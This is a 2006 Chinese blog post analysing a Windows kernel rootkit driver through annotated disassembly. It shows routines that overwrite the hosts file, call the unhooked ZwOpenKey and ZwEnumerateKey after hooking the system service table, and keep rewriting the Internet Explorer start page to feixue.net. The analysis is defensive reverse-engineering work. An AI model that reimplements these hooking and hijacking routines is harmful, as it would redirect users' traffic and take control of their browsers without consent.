  push ebx  ; Key
  push ebx  ; ByteOffset
  push edi  ; char *
  call strlen
  pop ecx
  push eax  ; Length
  push edi  ; Buffer
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  push ebx  ; ApcContext
  push ebx  ; ApcRoutine
  push ebx  ; Event
  push [ebp+Handle] ; FileHandle
  call ds:ZwWriteFile

;写入改过后的hosts文件!!!
  push edi  ; P
  call ds:ExFreePool

loc_10976:    ; CODE XREF: sub_107BD+165j
  push [ebp+Handle] ; Handle
  call ds:__imp_ZwClose
  push ebx  ; EaLength
  push ebx  ; EaBuffer
  push 40h  ; CreateOptions
  push 1  ; CreateDisposition
  push 1  ; ShareAccess
  push 80h  ; FileAttributes
  push ebx  ; AllocationSize
  lea eax, [ebp+IoStatusBlock]
  push eax  ; IoStatusBlock
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  push 80000000h ; DesiredAccess
  lea eax, [ebp+FileHandle]
  push eax  ; FileHandle
  mov [ebp+Handle], ebx
  mov [ebp+FileHandle], ebx
  call ds:ZwCreateFile

loc_109AA:    ; CODE XREF: sub_107BD+B6j
     ; sub_107BD+ECj sub_107BD+F5j
     ; sub_107BD+119j sub_107BD+151j
  pop edi

loc_109AB:    ; CODE XREF: sub_107BD+87j
     ; sub_107BD+96j
  cmp [ebp+Handle], ebx
  jz short loc_109B9
  push [ebp+Handle] ; Handle
  call ds:__imp_ZwClose

loc_109B9:    ; CODE XREF: sub_107BD+1F1j
  cmp [ebp+P], ebx
  jz short loc_109C7
  push [ebp+P]  ; P
  call ds:ExFreePool

loc_109C7:    ; CODE XREF: sub_107BD+1FFj
  xor eax, eax
  inc eax
  jmp short loc_109CE
; ---------------------------------------------------------------------------
loc_109CC:    ; CODE XREF: sub_107BD+5Fj
     ; sub_107BD+68j
  xor eax, eax

loc_109CE:    ; CODE XREF: sub_107BD+20Dj
  pop esi
  pop ebx
  leave
  retn
Write_Bad_host endp


;其他没用的子程序我就不分析了



;以下是写注册表IE首页设置的部分!

; *************** S U B R O U T I N E ***************************************
; Attributes: bp-based frame
; int __stdcall sub_11074(PCSZ SourceString)


Write_StartPage proc near


ObjectAttributes= OBJECT_ATTRIBUTES ptr -30h
DestinationString= UNICODE_STRING ptr -18h
ResultLength = dword ptr -10h
Handle  = dword ptr -0Ch
Index  = dword ptr -8
P  = dword ptr -4
SourceString = dword ptr  8
  push ebp
  mov ebp, esp
  sub esp, 30h
  push esi
  push offset s_RegistryUser ; "[url=file://\\registry\\user]\\registry\\user[/url]"
;要写入的是 User部分!
  lea eax, [ebp+DestinationString]
  push eax  ; DestinationString
  call ds:RtlInitUnicodeString
  lea eax, [ebp+DestinationString]
  mov [ebp+ObjectAttributes.ObjectName], eax
  lea eax, [ebp+ObjectAttributes]
  push eax  ; ObjectAttributes
  xor esi, esi
  push 0F003Fh  ; DesiredAccess
  lea eax, [ebp+Handle]
  push eax  ; KeyHandle
  mov [ebp+ObjectAttributes.Length], 18h
  mov [ebp+ObjectAttributes.RootDirectory], esi
  mov [ebp+ObjectAttributes.Attributes], 240h
  mov [ebp+ObjectAttributes.SecurityDescriptor], esi
  mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
  call off_11900
;这里是真实的ZwOpenKey地址!

;也就是被HOOK前的!

  test eax, eax
  jl loc_11189
  push ebx
  mov ebx, ds:ExAllocatePoolWithTag
  push edi
  mov [ebp+ResultLength], esi
  mov edi, 206B6444h
  push edi  ; Tag
  mov [ebp+Index], esi
  mov esi, 200h
  push esi  ; NumberOfBytes
  push 1  ; PoolType
  call ebx ; ExAllocatePoolWithTag
  test eax, eax
  mov [ebp+P], eax
  jz loc_1117E
  push edi  ; Tag
  mov edi, 400h
  push edi  ; NumberOfBytes
  push 1  ; PoolType
  call ebx ; ExAllocatePoolWithTag
  mov ebx, eax
  test ebx, ebx
  jz short loc_11175
  push esi  ; size_t
  push 0  ; int
  push [ebp+P]  ; void *
  call memset
  add esp, 0Ch
  lea eax, [ebp+ResultLength]
  push eax
  push esi
  push [ebp+P]
  push 0
  push 0
  jmp short loc_11161
; ---------------------------------------------------------------------------
loc_1111A:    ; CODE XREF: sub_11074+F8j
  push edi  ; size_t
  push 0  ; int
  push ebx  ; void *
  call memset
  mov eax, [ebp+P]
  add eax, 10h
  push eax
  push offset s_RegistryUserW ; "registry\user\%ws\Software\Microsoft\Internet Explorer\Main"...
;这里就是要改的位置了!

;registry\user\%ws\Software\Microsoft\Internet Explorer\Main

  push edi  ; size_t
  push ebx  ; wchar_t *
  call ds:_snwprintf
  add esp, 1Ch
  push [ebp+SourceString] ; SourceString
  push ebx  ; Handle
  call sub_10FC6

;这个子程序就是在写Main里面的 StartPage了!

  inc [ebp+Index]
  push esi  ; size_t
  push 0  ; int
  push [ebp+P]  ; void *
  call memset
  add esp, 0Ch
  lea eax, [ebp+ResultLength]
  push eax  ; ResultLength
  push esi  ; KeyInformationLength
  push [ebp+P]  ; KeyInformation
  push 0  ; KeyInformationClass
  push [ebp+Index] ; Index

loc_11161:    ; CODE XREF: sub_11074+A4j
  push [ebp+Handle] ; KeyHandle

;这里是枚举KEY!
  call off_1190C


;其实这里是ZwEnumerateKey
;被HOOK了!


  test eax, eax
  jge short loc_1111A
  push ebx  ; P
  call ds:ExFreePool

loc_11175:    ; CODE XREF: sub_11074+88j
  push [ebp+P]  ; P
  call ds:ExFreePool

loc_1117E:    ; CODE XREF: sub_11074+73j
  push [ebp+Handle] ; Handle

  call off_11904
;写完了调用被HOOK前的ZwCloseKey函数!


  pop edi
  pop ebx

loc_11189:    ; CODE XREF: sub_11074+4Aj
  xor eax, eax
  inc eax
  pop esi
  leave
  retn 4
Wrtie_StartPage endp

;综上,StartRoutine的主要作用就是
;1.挂钩系统服务表
;2.篡改Hosts表
;3.死循环,不停重写IE设置为feixue.net
posted on 2006-10-22 00:08  战神白起  阅读(1205)  评论(0编辑  收藏  举报

Copyright © 2024 战神白起
Powered by .NET 8.0 on Kubernetes Powered By博客园